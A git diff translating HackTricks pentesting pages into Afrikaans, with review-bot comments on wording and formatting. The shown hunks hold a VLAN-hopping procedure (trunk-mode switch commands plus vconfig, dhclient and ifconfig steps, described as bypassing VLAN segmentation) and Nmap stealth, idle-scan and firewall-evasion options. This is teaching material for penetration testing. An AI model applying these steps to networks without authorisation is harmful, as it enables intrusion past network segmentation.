- +Voor die oorskakeling na stammodus, moet 'n lys van bestaande VLAN's saamgestel word en hul identifiseerders bepaal word. Hierdie identifiseerders word dan toegewys aan die koppelvlak, wat toegang tot verskillende VLAN's deur die stam moontlik maak. Die gebruikte poort is byvoorbeeld geassosieer met VLAN 10. ``` SW1# show vlan brief ``` - -**Transitioning to trunk mode entails entering interface configuration mode**: - +**Oorgang na stammodus behels die ingang van die inteface-konfigurasie-modus**: ``` SW1(config)# interface GigabitEthernet 0/2 SW1(config-if)# switchport trunk encapsulation dot1q SW1(config-if)# switchport mode trunk ``` +Oorskakeling na stammodus sal tydelik konnektiwiteit onderbreek, maar dit kan later herstel word. -Switching to trunk mode will temporarily disrupt connectivity, but this can be restored subsequently. - -Virtual interfaces are then created, assigned VLAN IDs, and activated: - +Virtuele interfaces word dan geskep, VLAN-ID's toegewys en geaktiveer: ```bash sudo vconfig add eth0 10 sudo vconfig add eth0 20 
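Review bot: "inteface-konfigurasie-modus" in the bold lead-in to the interface commands is a typo ("interface"); the same hunk also uses "koppelvlak" and "interfaces" for that word, and "teikenvlans" sits beside "VLAN's" and "VLANs", so pick one form for each. Since the commands that follow use the IOS keyword `switchport mode trunk`, "trunkmodus" is clearer than "stammodus" for the mode name: readers map the prose to the command they type.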
@@ -50,38 +43,33 @@ sudo ifconfig eth0.20 up sudo ifconfig eth0.50 up sudo ifconfig eth0.60 up ``` - -Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured: - +Daarna word 'n adresversoek gedoen deur middel van DHCP. Alternatiewelik, in gevalle waar DHCP nie haalbaar is nie, kan adresse handmatig gekonfigureer word: ```bash sudo dhclient -v eth0.10 sudo dhclient -v eth0.20 sudo dhclient -v eth0.50 sudo dhclient -v eth0.60 ``` - -Example for manually setting a static IP address on an interface (VLAN 10): - +Voorbeeld vir die handmatige instelling van 'n statiese IP-adres op 'n koppelvlak (VLAN 10): ```bash sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0 ``` +Konnektiwiteit word getoets deur ICMP-versoeke na die verstekroetes vir VLANs 10, 20, 50 en 60 te begin. -Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60. +Uiteindelik maak hierdie proses dit moontlik om VLAN-segmentering te omseil, wat onbeperkte toegang tot enige VLAN-netwerk fasiliteer, en stel die verhoog vir daaropvolgende aksies. -Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions. - -## References +## Verwysings * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die [hacktricks-opslag](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-opslag](https://github.com/carlospolop/hacktricks-cloud)**.
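Review bot: "stel die verhoog vir daaropvolgende aksies" translates the idiom "setting the stage" literally ("verhoog" is a theatre stage); "baan die weg vir verdere aksies" carries the meaning. "verstekroetes" for "default gateways" reads as "default routes"; "verstek-gateways" keeps the distinction the connectivity test relies on. The support banner in this hunk also differs from the header banner of the same file earlier in the patch ("SUBSKRIPSIEPLANNE" and "HackTricks-uitrusting" here, "SUBSCRIPTION PLANS" and "HackTricks swag" there); the two copies should read the same.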
diff --git a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index ee3672773..699f28e6c 100644 --- a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md @@ -1,78 +1,72 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
## Multicast DNS (mDNS) -The **mDNS** protocol is designed for IP address resolution within small, local networks without a dedicated name server. It operates by multicasting a query within the subnet, prompting the host with the specified name to respond with its IP address. All devices in the subnet can then update their mDNS caches with this information. +Die **mDNS**-protokol is ontwerp vir IP-adresoplossing binne klein, plaaslike netwerke sonder 'n toegewyde naambediener. Dit werk deur 'n navraag binne die subnet uit te stuur, wat die gasheer met die gespesifiseerde naam aanmoedig om met sy IP-adres te reageer. Alle toestelle in die subnet kan dan hul mDNS-cache met hierdie inligting opdateer. -Key points to note: -- **Domain Name Relinquishment**: A host can release its domain name by sending a packet with a TTL of zero. -- **Usage Restriction**: mDNS typically resolves names ending in **.local** only. Conflicts with non-mDNS hosts in this domain require network configuration adjustments. -- **Networking Details**: - - Ethernet multicast MAC addresses: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. - - IP addresses: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`. - - Operates over UDP port 5353. - - mDNS queries are confined to the local network and do not cross routers. +Belangrike punte om op te let: +- **Domeinnaamverlating**: 'n Gasheer kan sy domeinnaam vrylaat deur 'n pakkie met 'n TTL van nul te stuur. +- **Gebruiksbeperking**: mDNS los gewoonlik slegs name op wat eindig op **.local**. Konflikte met nie-mDNS-gasheerders in hierdie domein vereis netwerkkonfigurasie-aanpassings. +- **Netwerkdetails**: +- Ethernet-multicast-MAC-adresse: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. +- IP-adresse: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`. +- Werk oor UDP-poort 5353. +- mDNS-navrae is beperk tot die plaaslike netwerk en steek nie roetings nie. 
-## DNS-SD (Service Discovery) +## DNS-SD (Diensontdekking) -DNS-SD is a protocol for discovering services on a network by querying specific domain names (e.g., `_printers._tcp.local`). A response includes all related domains, such as available printers in this case. A comprehensive list of service types can be found [here](http://www.dns-sd.org/ServiceTypes.html). +DNS-SD is 'n protokol vir die ontdekking van dienste op 'n netwerk deur spesifieke domeinname te ondervra (bv. `_printers._tcp.local`). 'n Antwoord sluit alle verwante domeine in, soos beskikbare drukkers in hierdie geval. 'n Omvattende lys van dienssoorte kan [hier](http://www.dns-sd.org/ServiceTypes.html) gevind word. -## SSDP (Simple Service Discovery Protocol) +## SSDP (Eenvoudige Diensontdekkingsprotokol) -SSDP facilitates the discovery of network services and is primarily utilized by UPnP. It's a text-based protocol using UDP over port 1900, with multicast addressing. For IPv4, the designated multicast address is `239.255.255.250`. SSDP's foundation is [HTTPU](https://en.wikipedia.org/wiki/HTTPU), an extension of HTTP for UDP. +SSDP fasiliteer die ontdekking van netwerkdienste en word hoofsaaklik deur UPnP gebruik. Dit is 'n teksgebaseerde protokol wat UDP oor poort 1900 gebruik, met multicast-adressering. Vir IPv4 is die aangewese multicast-adres `239.255.255.250`. SSDP se grondslag is [HTTPU](https://en.wikipedia.org/wiki/HTTPU), 'n uitbreiding van HTTP vir UDP. -## Web Service for Devices (WSD) -Devices connected to a network can identify available services, like printers, through the Web Service for Devices (WSD). This involves broadcasting UDP packets. Devices seeking services send requests, while service providers announce their offerings. +## Webdiens vir Toestelle (WSD) +Toestelle wat aan 'n netwerk gekoppel is, kan beskikbare dienste, soos drukkers, identifiseer deur middel van die Webdiens vir Toestelle (WSD). Dit behels die uitsaai van UDP-pakkies. 
Toestelle wat dienste soek, stuur versoek, terwyl diensverskaffers hul aanbiedinge aankondig. ## OAuth 2.0 -OAuth 2.0 is a protocol facilitating secure, selective sharing of user information between services. For instance, it enables services to access user data from Google without multiple logins. The process involves user authentication, authorization by the user, and token generation by Google, allowing service access to the specified user data. +OAuth 2.0 is 'n protokol wat die veilige, selektiewe deling van gebruikersinligting tussen dienste fasiliteer. Dit maak dit byvoorbeeld moontlik vir dienste om toegang tot gebruikersdata van Google te verkry sonder veelvuldige aanmeldings. Die proses behels gebruikersverifikasie, magtiging deur die gebruiker, en token-generering deur Google, wat diens toegang tot die gespesifiseerde gebruikersdata moontlik maak. ## RADIUS -RADIUS (Remote Authentication Dial-In User Service) is a network access protocol primarily used by ISPs. It supports authentication, authorization, and accounting. User credentials are verified by a RADIUS server, potentially including network address verification for added security. Post-authentication, users receive network access and their session details are tracked for billing and statistical purposes. +RADIUS (Remote Authentication Dial-In User Service) is 'n netwerktoegangsprotokol wat hoofsaaklik deur internetdiensverskaffers gebruik word. Dit ondersteun verifikasie, magtiging en boekhouding. Gebruikerslegitimasie word geverifieer deur 'n RADIUS-bedieners, wat moontlik netwerkadresverifikasie vir bygevoegde sekuriteit kan insluit. Na verifikasie ontvang gebruikers netwerktoegang en word hul sessiebesonderhede vir fakturerings- en statistiese doeleindes gevolg. -## SMB and NetBIOS +## SMB en NetBIOS ### SMB (Server Message Block) -SMB is a protocol for sharing files, printers, and ports. It operates directly over TCP (port 445) or via NetBIOS over TCP (ports 137, 138). 
This dual compatibility enhances connectivity with various devices. +SMB is 'n protokol vir die deel van lêers, drukkers en poorte. Dit werk direk oor TCP (poort 445) of via NetBIOS oor TCP (poorte 137, 138). Hierdie dubbele verenigbaarheid verbeter die konnektiwiteit met verskillende toestelle. ### NetBIOS (Network Basic Input/Output System) -NetBIOS manages network sessions and connections for resource sharing. It supports unique names for devices and group names for multiple devices, enabling targeted or broadcast messaging. Communication can be connectionless (no acknowledgment) or connection-oriented (session-based). While NetBIOS traditionally operates over protocols like IPC/IPX, it's commonly used over TCP/IP. NetBEUI, an associated protocol, is known for its speed but was also quite verbose due to broadcasting. +NetBIOS bestuur netwerksessies en -verbindings vir die deling van hulpbronne. Dit ondersteun unieke name vir toestelle en groepname vir meervoudige toestelle, wat geteikende of uitsaai-boodskappe moontlik maak. Kommunikasie kan verbindingsloos (sonder bevestiging) of verbindingsgeoriënteerd (sessiegebaseerd) wees. Terwyl NetBIOS tradisioneel oor protokolle soos IPC/IPX werk, word dit algemeen oor TCP/IP gebruik. NetBEUI, 'n geassosieerde protokol, staan bekend om sy spoed, maar was ook nogal omslagtig as gevolg van uitsaai. ## LDAP (Lightweight Directory Access Protocol) -LDAP is a protocol enabling the management and access of directory information over TCP/IP. It supports various operations for querying and modifying directory information. Predominantly, it's utilized for accessing and maintaining distributed directory information services, allowing interaction with databases designed for LDAP communication. +LDAP is 'n protokol wat die bestuur en toegang tot gidsinligting oor TCP/IP moontlik maak. Dit ondersteun verskeie operasies vir die ondervraging en wysiging van gidsinligting. 
Dit word hoofsaaklik gebruik vir die toegang en instandhouding van verspreide gidsinligtingsdienste, wat interaksie met databasisse wat ontwerp is vir LDAP-kommunikasie moontlik maak. ## Active Directory (AD) -Active Directory is a network-accessible database containing objects like users, groups, privileges, and resources, facilitating centralized management of network entities. AD organizes its data into a hierarchical structure of domains, which can encompass servers, groups, and users. Subdomains allow further segmentation, each potentially maintaining its own server and user base. This structure centralizes user management, granting or restricting access to network resources. Queries can be made to retrieve specific information, like contact details, or to locate resources, like printers, within the domain. +Active Directory is 'n netwerktoeganklike databasis wat voorwerpe soos gebruikers, groepe, voorregte en hulpbronne bevat, wat die gesentraliseerde bestuur van netwerkentiteite fasiliteer. AD organiseer sy data in 'n hiërargiese struktuur van domeine, wat bedieners, groepe en gebruikers kan insluit. Subdomeine maak verdere segmentering moontlik, waarvan elkeen moontlik sy eie bediener en gebruikersbasis handhaaf. Hierdie struktuur sentraliseer gebruikersbestuur, wat toegang tot netwerkbronne verleen of beperk. Navrae kan gedoen word om spesifieke inligting, soos kontakbesonderhede, op te haal, of om hulpbronne, soos drukkers, binne die domein te vind.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! +Ander maniere om HackTricks te ondersteun: +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-op diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index 91ce4bd5b..40097e7df 100644 --- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -1,104 +1,87 @@ -# Nmap Summary (ESP) +# Nmap Opsomming (ESP)
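Review bot: In the network-protocols-explained-esp.md hunk the translated footer's last list item is cut off mid-word (`GitHub-op`, where the header footer of the same file reads `GitHub-opslag`), so the translated file ends on a truncated line; restore the full item. The same hunk flattens the sub-list under **Netwerkdetails**: the original indents the four `- Ethernet-multicast-MAC-adresse` / `- IP-adresse` / `- Werk oor UDP-poort 5353` / `- mDNS-navrae` items by two spaces, the `+` lines drop the indent, so they render as siblings of the top-level bullets instead of children. Two wording points: `steek nie roetings nie` renders "do not cross routers" with the word for routings, `roeteerders` (or simply `routers`) is meant; and `'n RADIUS-bedieners` pairs a singular article with a plural noun.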
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- ``` nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 ``` - ## Parameters -### IPs to scan +### IP's om te skandeer -* **`,`:** Indicate the ips directly -* **`-iL `:** list\_IPs -* **`-iR `**: Number of random Ips, you can exclude possible Ips with `--exclude ` or `--excludefile `. +* **`,`:** Dui die IP's direk aan +* **`-iL `:** lys_IPs +* **`-iR `**: Aantal lukrake IP's, jy kan moontlike IP's uitsluit met `--exclude ` of `--excludefile `. -### Equipment discovery +### Toerusting ontdekking -By default Nmap launches a discovery phase consisting of: `-PA80 -PS443 -PE -PP` +Standaard lanceer Nmap 'n ontdekkingsfase wat bestaan uit: `-PA80 -PS443 -PE -PP` -* **`-sL`**: It is not invasive, it lists the targets making **DNS** requests to resolve names. It is useful to know if for example www.prueba.es/24 all Ips are our targets. -* **`-Pn`**: **No ping**. This is useful if you know that all of them are active (if not, you could lose a lot of time, but this option also produces false negatives saying that they are not active), it prevents the discovery phase. -* **`-sn`** : **No port scan**. After completing the reconnaissance phase, it does not scan ports. It is relatively stealthy, and allows a small network scan. With privileges it sends an ACK (-PA) to 80, a SYN(-PS) to 443 and an echo request and a Timestamp request, without privileges it always completes connections. If the target is the network, it only uses ARP(-PR). If used with another option, only the packets of the other option are dropped. -* **`-PR`**: **Ping ARP**. It is used by default when analyzing computers in our network, it is faster than using pings. If you do not want to use ARP packets use `--send-ip`. -* **`-PS `**: It sends SYN packets to which if it answers SYN/ACK it is open (to which it answers with RST so as not to end the connection), if it answers RST it is closed and if it does not answer it is unreachable. In case of not having privileges, a total connection is automatically used. 
If no ports are given, it throws it to 80. -* **`-PA `**: Like the previous one but with ACK, combining both of them gives better results. -* **`-PU `**: The objective is the opposite, they are sent to ports that are expected to be closed. Some firewalls only check TCP connections. If it is closed it is answered with port unreachable, if it is answered with another icmp or not answered it is left as destination unreachable. -* **`-PE, -PP, -PM`** : ICMP PINGS: echo replay, timestamp and addresmask. They are launched to find out if the target is active. -* **`-PY`**: Sends SCTP INIT probes to 80 by default, INIT-ACK(open) or ABORT(closed) or nothing or ICMP unreachable(inactive) can be replied. -* **`-PO `**: A protocol is indicated in the headers, by default 1(ICMP), 2(IGMP) and 4(Encap IP). For ICMP, IGMP, TCP (6) and UDP (17) protocols the protocol headers are sent, for the rest only the IP header is sent. The purpose of this is that due to the malformation of the headers, Protocol unreachable or responses of the same protocol are answered to know if it is up. -* **`-n`**: No DNS -* **`-R`**: DNS always +* **`-sL`**: Dit is nie indringend nie, dit lys die teikens deur **DNS** navrae te maak om name op te los. Dit is nuttig om te weet of byvoorbeeld www.prueba.es/24 al die IP's ons teikens is. +* **`-Pn`**: **Geen ping**. Dit is nuttig as jy weet dat almal aktief is (as nie, kan jy baie tyd verloor, maar hierdie opsie gee ook vals negatiewe resultate deur te sê dat hulle nie aktief is nie), dit voorkom die ontdekkingsfase. +* **`-sn`** : **Geen poort skandering**. Nadat die verkenningsfase voltooi is, skandeer dit nie poorte nie. Dit is relatief stil en maak 'n klein netwerk skandering moontlik. Met voorregte stuur dit 'n ACK (-PA) na 80, 'n SYN(-PS) na 443 en 'n echo versoek en 'n Timestamp versoek, sonder voorregte voltooi dit altyd verbindings. As die teiken die netwerk is, gebruik dit slegs ARP(-PR). 
As dit saam met 'n ander opsie gebruik word, word slegs die pakkies van die ander opsie laat val. +* **`-PR`**: **Ping ARP**. Dit word standaard gebruik wanneer rekenaars in ons netwerk geanaliseer word, dit is vinniger as om pings te gebruik. As jy nie ARP-pakkies wil gebruik nie, gebruik `--send-ip`. +* **`-PS `**: Dit stuur SYN-pakkies na poorte waarop as dit antwoord met SYN/ACK dit oop is (waarop dit met RST antwoord om die verbinding nie te beëindig nie), as dit met RST antwoord is dit gesluit en as dit nie antwoord nie is dit onbereikbaar. In die geval van geen voorregte word 'n totale verbinding outomaties gebruik. As geen poorte gegee word, stuur dit dit na 80. +* **`-PA `**: Soos die vorige een, maar met ACK, deur beide te kombineer gee dit beter resultate. +* **`-PU `**: Die doel is die teenoorgestelde, dit word gestuur na poorte wat verwag word om gesluit te wees. Sommige vuurmuure kyk slegs na TCP-verbindings. As dit gesluit is, word daar met 'n onbereikbare poort geantwoord, as daar met 'n ander ICMP geantwoord word of nie geantwoord word nie, word dit as 'n onbereikbare bestemming gelaat. +* **`-PE, -PP, -PM`** : ICMP PINGS: echo antwoord, tydmerk en adresmasker. Dit word geloods om uit te vind of die teiken aktief is. +* **`-PY`**: Stuur SCTP INIT sondes na 80 standaard, INIT-ACK(oop) of ABORT(gesluit) of niks of ICMP onbereikbaar(inaktief) kan geantwoord word. +* **`-PO `**: 'n Protokol word aangedui in die koppe, standaard 1(ICMP), 2(IGMP) en 4(Encap IP). Vir ICMP, IGMP, TCP (6) en UDP (17) protokolle word die protokol koppe gestuur, vir die res word slegs die IP-kop gestuur. Die doel hiervan is dat as gevolg van die misvorming van die koppe, Protokol onbereikbaar of antwoorde van dieselfde protokol geantwoord word om te weet of dit aktief is. 
+* **`-n`**: Geen DNS +* **`-R`**: DNS altyd -### Port scanning techniques +### Poort skandering tegnieke -* **`-sS`**: Does not complete the connection so it leaves no trace, very good if it can be used.(privileges) It is the one used by default. -* **`-sT`**: Completes the connection, so it does leave a trace, but it can be used for sure. By default without privileges. -* **`-sU`**: Slower, for UDP. Mostly: DNS(53), SNMP(161,162), DHCP(67 and 68), (-sU53,161,162,67,68): open(reply), closed(port unreachable), filtered (another ICMP), open/filtered (nothing). In case of open/filtered, -sV sends numerous requests to detect any of the versions that nmap supports and can detect the true state. It increases a lot the time. -* **`-sY`**: SCTP protocol fails to establish the connection, so there are no logs, works like -PY -* **`-sN,-sX,-sF`:** Null, Fin, Xmas, they can penetrate some firewalls and extract information. They are based on the fact that standard compliant machines should respond with RST all requests that do not have SYN, RST or ACK lags raised: open/filtered(nothing), closed(RST), filtered (ICMP unreachable). Unreliable on WIndows, CIsco, BSDI and OS/400. On unix yes. -* **`-sM`**: Maimon scan: Sends FIN and ACK flags, used for BSD, currently will return all as closed. -* **`-sA, sW`**: ACK and Window, is used to detect firewalls, to know if the ports are filtered or not. The -sW does distinguish between open/closed since the open ones respond with a different window value: open (RST with window other than 0), closed (RST window = 0), filtered (ICMP unreachable or nothing). Not all computers work this way, so if it is all closed, it is not working, if it is a few open, it is working fine, and if it is many open and few closed, it is working the other way around. -* **`-sI`:** Idle scan. 
For the cases in which there is an active firewall but we know that it does not filter to a certain Ip (or when we simply want anonymity) we can use the zombie scanner (it works for all the ports), to look for possible zombies we can use the scrpit ipidseq or the exploit auxiliary/scanner/ip/ipidseq. This scanner is based on the IPID number of the IP packets. -* **`--badsum`:** It sends the sum wrong, the computers would discard the packets, but the firewalls could answer something, it is used to detect firewalls. -* **`-sZ`:** "Weird" SCTP scanner, when sending probes with cookie echo fragments they should be dropped if open or responded with ABORT if closed. It can pass through firewalls that init does not pass through, the bad thing is that it does not distinguish between filtered and open. -* **`-sO`:** Protocol Ip scan. Sends bad and empty headers in which sometimes not even the protocol can be distinguished. If ICMP unreachable protocol arrives it is closed, if unreachable port arrives it is open, if another error arrives, filtered, if nothing arrives, open|filtered. -* **`-b `:** FTPhost--> It is used to scan a host from another one, this is done by connecting the ftp of another machine and asking it to send files to the ports that you want to scan from another machine, according to the answers we will know if they are open or not. \[\:\@]\\[:\] Almost all ftps servers no longer let you do this and therefore it is of little practical use. - -### **Centrar análisis** - -**-p:** Sirve para dar los puertos a escanear. Para seleccionar los 65335: **-p-** o **-p all**. Nmap tiene una clasificaación interna según su popularidad. Por defecto usa los 1000 ppales. Con **-F** (fast scan) analiza los 100 ppales. Con **--top-ports \** Analiza ese numero de ppales (de 1 hasta los 65335). Comprueba los puertos en orden aleatorio, para que eso no pase **-r**. También podemos seleccionar puertos: 20-30,80,443,1024- Esto ultimo significa que mire en adelante del 1024. 
También podemos agrupar los puertos por protocolos: U:53,T:21-25,80,139,S:9. También podemos escoger un rango dentro de los puertos populares de nmap: -p \[-1024] analiza hasta el 1024 de los incluidos en nmap-services. **--port-ratio \** Analiza los puertos más comúnes que un ratio que debe estar entre 0 y 1 - -**-sV** Escaneado de versión, se puede regular la intensidad de 0 a 9, por defecto 7. - -**--version-intensity \** Regulamos la intensidad, de forma que cuanto más bajo solo lanzará las sondas más probables, pero no todas. Con esto podemos acortar considerablemente el tiempo de escaneo UDP - -**-O** Deteccion de os - -**--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se da esta condición y hemos puesto esto, no intenta hacer predicción de os (ahorra tiempo) - -**--osscan-guess** Cuando la detección de os no es perfecta esto hace que se esfuerce más +* **`-sS`**: Voltooi nie die verbinding nie, so dit laat geen spoor agter nie, baie goed as dit gebruik kan word.(voorregte) Dit is die een wat standaard gebruik word. +* **`-sT`**: Voltooi die verbinding, so dit laat 'n spoor agter, maar dit kan veilig gebruik word. Standaard sonder voorregte. +* **`-sU`**: Stadiger, vir UDP. Meestal: DNS(53), SNMP(161,162), DHCP(67 en 68), (-sU53,161,162,67,68): oop(antwoord), gesluit(poort onbereikbaar), gefiltreer (ander ICMP), oop/gefiltreer (niks). In die geval van oop/gefiltreer, stuur -sV talle versoek om enige van die weergawes wat nmap ondersteun op te spoor en die ware toestand te bepaal. Dit verhoog die tyd aansienlik. +* **`-sY`**: SCTP-protokol slaag nie daarin om die verbinding te vestig nie, so daar is geen logboeke nie, werk soos -PY +* **`-sN,-sX,-sF`:** Null, Fin, Xmas, hulle kan deur sommige vuurmuure dring en inligting onttrek. 
